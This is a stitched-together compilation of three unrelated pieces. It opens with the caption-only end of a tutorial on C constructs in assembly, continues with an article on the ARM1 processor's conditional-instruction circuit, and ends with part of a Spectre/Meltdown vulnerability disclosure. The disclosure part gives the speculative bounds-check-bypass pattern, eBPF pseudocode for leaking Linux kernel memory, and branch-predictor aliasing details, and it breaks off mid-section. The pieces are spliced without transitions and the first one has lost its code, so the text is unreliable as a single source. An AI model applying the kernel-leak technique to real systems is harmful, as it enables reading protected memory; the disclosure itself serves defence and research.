Declaring an array with a variable — code
Declaring an array with a variable — assembly
declaring an array with pre-defined objects — code
declaring an array with pre-defined objects — assembly

When declaring an array with pre-defined index definitions the compiler simply saves each pre-defined object into its own variable which represents the index within the array (i.e. objArray4 = objArray[4])

initializing an array index — code

 

initializing an array index — assembly

 

Much like declaring an array with pre-defined index definitions, when initializing (or setting) an index in an array, the compiler creates a new variable for said index.

retrieving an item from an array — code

 

retrieving an item from an array — assembly

 

When retrieving items from arrays, the item is taken from the index within the array and set to the desired variable.

creating a matrix with variables — code

Creating a matrix with variables — assembly

When creating a matrix, first the row and column sizes are set to their row and col variables. Next, the maximum and minimum indexes for the rows and columns are calculated and used to calculate the base location / overall size of the matrix in memory.

inputting to a matrix — code
inputting to a matrix — assembly

When inputting into a matrix, first the location of desired index is calculated using the matrix’s base location. Next, the contents of said index location is set to the desired input (i.e. 1337).

Retrieving from a matrix — code
Retrieving from a matrix — assembly

When retrieving from a matrix the same calculation as performed during the input sequence for the matrix index is performed again but instead of inputting something into the index, the index’s contents are retrieved and set to a desired variable (i.e. MatrixLeet).

Pointers

Now that we understand how arrays are used / look in assembly, let’s move on to pointers.

ointers — Code

Let’s break the assembly down now:

int num = 10 in assembly

First we set int num to 10

.

pointer = &num

Next we set the contents of the num variable (i.e. 10) to the contents of the pointer variable.

printf num — assembly

We print out the num variable.

printf *pointer — assembly

We print out the pointer variable.

printf address of num — assembly

We print out the address of the num variable by using the lea (load effective address) opcode instead of mov.

printf address of num using pointer variable — assembly

We print the address of the num variable through the pointer variable.

rintf address of pointer — assembly

we print the address of the pointer variable using the lea (load effective address) opcode instead of mov.

Dynamic Memory Allocation

The next item on our list is dynamic memory allocation. In this tutorial I will break down memory allocation using:

  1. malloc
  2. calloc
  3. realloc

malloc — dynamic memory allocation

First, let’s take a look at the code:

Dynamic memory allocation using malloc — code

 

In this function we allocate 11 characters using malloc and then copy “Hello World” into the allocated memory space.

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see ‘nop’ instructions. these instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using malloc — assembly

When using malloc, first the size of the allocated memory (0x0B) is first moved into the edi register. Next, the _malloc system function is called to allocate memory. The allocated memory area is then stored in the ptr variable. Next, the “Hello World” string is broken down into “Hello Wo” and “rld” as it is copied into the allocated memory space. Finally, the newly copied “Hello World” string is printed out and the allocated memory is freed using the _free system function.

calloc — dynamic memory allocation

First, let’s take a look at the code:

dynamic memory allocation using calloc — code

Much like in the malloc technique, space for 11 characters is allocated and then the “Hello World” string is copied into said space. Then, the newly relocated “Hello World” is printed out and the allocated memory space is freed.

dynamic memory allocation using calloc — assembly

Dynamic memory allocation through calloc looks nearly identical to dynamic memory allocation through malloc when broken down into assembly.

First, space for 11 characters (0x0B) is allocated using the _calloc system function. Then, the “Hello World” string is broken down into “Hello Wo” and “rld” as it is copied into the newly allocated memory area. Next, the newly relocated “Hello World” string is printed out and the allocated memory area is freed using the _free system function.

realloc — dynamic memory allocation

First, let’s look at the code:

dynamic memory allocation using realloc — code

In this function, space for 11 characters is allocated using malloc. Then, “Hello World” is copied into the newly allocated memory space before said memory location is reallocated to fit 21 characters by using realloc. Finally, “1337 h4x0r @nonymoose” is copied into the newly reallocated space. Finally, after printing, the memory is freed.

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see ‘nop’ instructions. these instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using realloc — assembly

First, memory is allocated using malloc precisely as it was in the above “malloc — dynamic memory allocation” section. Then, after printing out the newly relocated “Hello World” string, realloc (_realloc system call) is called on the ptr variable (that represents the mem_alloc variable in the code) and a size of 0x15 (21 in decimal) is passed in as well. Next, “1337 h4x0r @nonymoose” is broken down into “1337 h4x”, “0r @nony”, “moos”, and “e” as it is copied into the newly re-allocated memory space. Finally, the space is freed using the _free system call

Socket Programming

Next, we’ll cover socket programming by breaking down a very basic TCP client-server chat system.

Before we begin breaking down the server / client code, it is important to point out the following line of code at the top of the file:

define the Port number

This line defines the PORT variable as 1337. This variable will be used in both the client and the server as the network port used to create the connection.

Server

First, let’s look at the code:

Server — Code

First, the socket file descriptor ‘server’ is created with the AF_INET domain, the SOCK_STREAM type, and protocol code 0. Next, the socket options and the address is configured. Then, the socket is bound to the network address / port and the server begins to listen on said server with a maximum queue length of 3. Upon receiving a connection, the server accepts it into the sock variable and reads the transmitted value into the value variable. Finally, the server sends the serverhello string over the connection before the function returns.

Now, let’s break it down into assembly:

initiating the server variables

First, the server variables are created and initialized.

server = socket(…) — assembly

Next, the socket file descriptor ‘server’ is created by calling the _socket system function with the protocol, type, and domain settings passed through the edxesi, and edi registers respectively.

setockopt(…) — assembly

Then, setsockopt is called to set the socket options on the ‘server’ socket file descriptor.

address initialization — assembly

Next, the server’s address is initialized through adress.sin_familyaddress.sin_addr.s_addr, and address.sin_port.

bind(…) — assembly

Upon address and socket configuration, the server is bound to the network address using the _bind system call.

listen(…) — assembly

Once bound, the server listens on the socket by passing in the ‘server’ socket file descriptor and a max queue length of 3.

sock = accept(…) — assembly

Once a connection is made, the server accepts the socket connection into the sock variable.

value = read(…) — assembly

The server then reads the transmitted message into the value variable using the _read system call.

send(…) — assembly

Finally, the server sends the serverhello message through the variable (which represents serverhello in the code).

Client

First, let’s look at the code: 

Client — code

first, the socket file descriptor ‘sock’ is created with the AF_INET domain, SOCK_STREAM type, and protocol code 0. Next, memset is used to fill the memory area of server_addr with ‘0’s before address information is set using server_addr.sin_family and server_addr.sin_port. Next, the address information is converted from text to binary format using inet_pton before the client connects to the server. Upon connection, the client sends it’s helloclient string and then reads the server’s response into the value variable. Finally, the value variable is printed out and the function returns.

Now, let’s break down the assembly:

Client variable initialization — assembly

First, the client’s local variables are initialized.

sock = socket(…) — assembly

The ‘sock’ socket file descriptor is created by calling the _socket system function and passing in the protocol, type, and domain information through the edxesi, and edi registers respectively.

memset(…) — assembly

Next, the server_address variable (represented as ‘s’ in assembly) is filled with ‘0’s (0x30) using the _memset system call.

Client — address configuration — assembly

Then, the address information for the server is configured.

inet_pton(…) — assembly

Next, the address is translated from text to binary format using the _inet_pton system call. Please note that since no address was explicitly defined in the code, localhost (127.0.0.1) is assumed.

connect(…) — assembly

The client connects to the server using the _connect system call.

send(…) — assembly

Upon connecting, the client sends the helloClient string to the server.

value = read(…)

Finally, the client reads the server’s reply into the value variable using the _read system call.

Threading

Finally, we’ll cover the basics of threading in C.

First, let’s look at the code:

Threading — Code

As you can see, the program first prints “This is before the thread”, then creates a new thread that points to the *mythread function using the pthread_create function. Upon completion of the *mythread function (after sleeping for 1 second and printing “Hello from mythread”), the new thread is joined back the main thread using the pthread_join function and “This is after the thread” is printed.

Now, let’s break down the assembly:

printf “This is before the thread” — assembly

First, the program prints “This is before the thread”.

Creating a new thread — assembly

Next, a new thread is created with the _pthread_create system call. This thread points to mythread as it’s start routine.

The mythread function — assembly

As you can see, the mythread function simply sleeps for one second before printing “Hello from mythread”.

Please note: In the mythread function you will see two ‘nop’s. These were specifically placed for easier navigation during the preparation stage of this article.

joining the mythread function’s thread back to the main thread — assembly

Upon returning from the mythread function, the new thread is joined with the main thread using the _pthread_join function.

printf “This is after the thread” — assembly

Finally, “This is after the thread” is printed out and the function returns.

Closing Statements

I hope this article was able to shed some light on some more advanced programming concepts and their underlying assembly code. Now that we’ve covered all the major programming concepts, the next few articles in the BOLO: Reverse Engineering series will be dedicated to different types of attacks and vulnerable code so that you may be able to more quickly identify vulnerabilities and attacks within closed source programs through static analysis.

Conditional instructions in the ARM1 processor, reverse engineered

By carefully examining the layout of the ARM1 processor, it can be reverse engineered. This article describes the interesting circuit used for conditional instructions: this circuit is marked in red on the die photo below. Unlike most processors, the ARM executes every instruction conditionally. Each instruction specifies a condition and is only executed if the condition is satisfied. For every instruction, the condition circuit reads the condition from the instruction register (blue), evaluates the condition flags (purple), and informs the control logic (yellow) if the instruction should be executed or skipped.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

Why care about the ARM1 chip? It is the highly-influential ancestor of the extremely popular ARM processor. The ARM1 processor got off to a slow start in 1985 but now ARM processors are now sold by the tens of billions; your smart phone probably runs on ARM. This article is part of my series on reverse engineering the ARM1; start with my first article for an overview of the chip.

What are conditional instructions?

A key part of any computer is the ability of a program to change what it is doing based on various conditions. Most computers provide conditional branch instructions, which cause execution to jump to a different part of the program based on various condition flags. For example, consider the code if (x == 0) { do_something }. Compiled to assembly code, this first tests the value of variable x and sets the Zero flag if x is 0. Next, a conditional branch instruction jump over the do_something code if the Zero flag is not set.

The ARM processor takes conditionals much further than other processors: every instruction becomes a conditional instruction. Every instruction includes one of 16 conditions and the instruction is only executed if the condition is true; otherwise the instruction is skipped. (This is also known as predication.) The motivation is to avoid inefficient jumping around in the code.

The ARM manual excerpt below shows how four bits in each 32-bit instruction specify one of 16 conditions. Most of the conditions are straightforward, checking if values are equal, negative, higher, and so forth. Most instructions will use the «always» condition, which simply means the instruction always executes. The opposite «never» condition is not highly useful — an instruction with that condition never executes — but it can be used for a NOP, patching code, or adjusting timing of an instruction sequence.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Studying the different conditions reveals much of how the condition circuit works. It is based on four condition flags. The zero (Z) flag is set if a value is zero. The negative (N) flag is set if a value is negative. The carry (C) flag is set if there is a carry or borrow from addition or subtraction. The overflow (V) flag is set if there is an overflow during signed arithmetic (details).

The top three bits of the instruction select one of eight conditions, as highlighted in yellow. The fourth bit selects the condition or its opposite (blue). If the fourth bit is 0, the condition must be true; if the fourth bit is 1, the condition must be false.

Implementation of the circuit

The implementation of the conditional logic circuit matches the above description. First, the eight conditions are generated from the four flags. One of the conditions is selected based on the three instruction bits. If the fourth instruction bit is set, the condition is flipped. The result is 1 if the condition is satisfied, and 0 if the condition is not satisfied. One unexpected part of the circuit is that an undefined instruction or and interrupt causes the condition to be cleared, preventing execution of the instruction. The resulting condition signal output is connected to a control part of the chip, where it causes the instruction to be executed or not, as desired.

The condition code evaluation circuit from the ARM1 processor.

The condition code evaluation circuit from the ARM1 processor.

The diagram above shows the condition code circuit of the chip as it appears in the simulator; this is a zoomed-in version of the red rectangle indicated on the die earlier. The chip consists of multiple layers, indicated by different colors. Transistors appear as red or blue regions. NMOS transistors are red; they turn on with a 1 input and can pull their output low. PMOS transistors (blue) are complementary; they turn on with a 0 input and can pull their output high. Physically above the transistors is the polysilicon wiring layer (green). When polysilicon crosses a transistor it forms the gate (yellow) that controls the transistor. Finally, two layers of metal wiring (gray) are above the polysilicon.

The circuit is arranged in columns. The first column of transistors forms the logic gates to generate the conditions from the flag values. The next column is the multiplexer, a circuit that takes the eight input conditions and selects one. The rightmost column contains 8 NAND gates that decode the three instruction bits into 8 control lines. Each line is fed into the multiplexer to select the corresponding condition. At the right is the wiring for the 3 instruction bits and their complements. A few miscellaneous gates are at the bottom of the multiplexer and decoder columns. These include inverters to complement the instruction bits.

The condition generation gates

The diagram below zooms in on the left third of the circuit above. This part of the circuit uses standard CMOS logic gates to computes the conditions from the flags. Each gate is built from NMOS (red) and PMOS (blue) transistors in a horizontal strip. Comparing the text description of conditions from the manual with the logic shows how the conditions are generated. For instance, the HI (unsigned higher) condition requires flags «C set and Z clear». The top three gates generate this condition. The GE (greater than or equal) condition is more complex, requiring flags «N set and V set, or N clear and V clear». The next two gates compute this value. (Due to the way CMOS gates are constructed, an OR-NAND gate is constructed as a single gate.) Likewise, the other conditions are generated. The AL (always) condition is simply a 1, and doesn’t require any circuitry. The conditions are fed into the multiplexer, which will be discussed below.

The output coming back from the multiplexer is the selected condition, labeled «cond» below. The NAND and OR-NAND gates flip the condition if instruction register bit 28 (ireg28) is set. This implements the eight opposite conditions. The result is labeled «ok», indicating the overall condition is satisfied. The final three gates block instruction execution for an interrupt or undefined instruction.

Gates in the ARM1 processor generate the various conditionals from the flag values.

Gates in the ARM1 processor generate the various conditionals from the flag values.

One thing I’d like to emphasize about the ARM1 is that its layout is very orderly and non-optimized. While it may appear chaotic, the gates are arranged by combining relatively fixed blocks («standard cells») and wiring them together. Each gate forms a strip and the gates are stacked together in columns. The polysilicon and metal layers connect the gates as necessary.

The layout of the ARM1 chip is a consequence of the VLSI Technology chip design software used to create it. The resulting layout is simple, but doesn’t use space very efficiently. Since the ARM1 uses very few transistors for its time, the designers weren’t worried about optimizing the layout. In contrast, earlier chips such as the Z-80 were hand-drawn, with each transistor and wire carefully shaped to use the minimum space possible. The diagram below shows a small part of the Z-80 processor layout, showing the extremely irregular but dense arrangement of the chip. The transistors are not arranged in rows as in the ARM1 above, but fit together to use all the available space.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip's size.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip’s size.

The multiplexer and decoders

Selecting the desired condition out of the eight possibilities is the job of a circuit called the multiplexer. The multiplexer takes 8 inputs (the conditions) and 8 control signals (based on the instruction) and selects the desired condition. To the right of the multiplexer, 8 NAND gates generate the 8 control signals by decoding the three instruction bits. Each gate simply looks at three bit values and outputs a 0 if the bits select that condition. For instance, if the first two bits are 0 and the third is 1, the gate for condition 1 outputs a 0, selecting that condition in the multiplexer. The animation below shows the circuit as the instruction bits cycle through the eight conditions. You can see the activated condition moving downwards through the circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

While a multiplexer can be built from standard logic gates, the ARM1 multiplexer is built from a different type of circuitry called transmission gates (which the ARM1 also uses in its bit counter). A multiplexer built from transmission gates is more compact and faster than one built from standard logic (NAND gates). One feature of CMOS is that by combining an NMOS transistor and a PMOS transistor in parallel, a transmission gate switch can be built. Feeding 1 into the NMOS gate and 0 into the PMOS gate turns on both transistors and they pass their input through. With the opposite gate values, both transistors turn off and the switch opens. The multiplexer is built from 8 of these CMOS switches. Each condition input feeds into one switch, and the switch outputs are connected together. One switch is turned on at a time, selecting the corresponding input as the output value.

The diagram below shows the schematic of the multiplexer as well as its physical layout on the chip. Only the first three segments of the eight are shown; the remainder are similar. Each input is connected to two transistors forming a CMOS switch. Because the NMOS and PMOS gates require opposite signals, the multiplexer has an inverter for each control signal. Each inverter also consists of two transistors, but wired differently from the switch.

Schematic of the multiplexer inside the ARM1 processor's condition code evaluation circuit.Diagram of the multiplexer inside the ARM1 processor's condition code evaluation circuit.

Schematic and diagram of the multiplexer inside the ARM1 processor’s condition code evaluation circuit.

Working together the decode circuit, inverters, and CMOS switches form the multiplexer that selects the desired condition from the eight choices. The logic described earlier allows this condition to be flipped, for a total of 16 possible conditions.

Conclusion

One unusual feature of the ARM instruction set is that every instruction has a condition associated with it and is only executed if the condition is true. The ARM1 chip is simple enough that the condition circuitry on the chip can be examined and understood at the transistor and gate level. Now that you’ve seen the internals of the condition logic, you can use the Visual ARM1 simulator to see the circuit in action. While the ARM1 may seem like a historical artifact of the 1980s, ARM processors power most smartphones, so there’s probably a similar circuit controlling your phone right now.

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

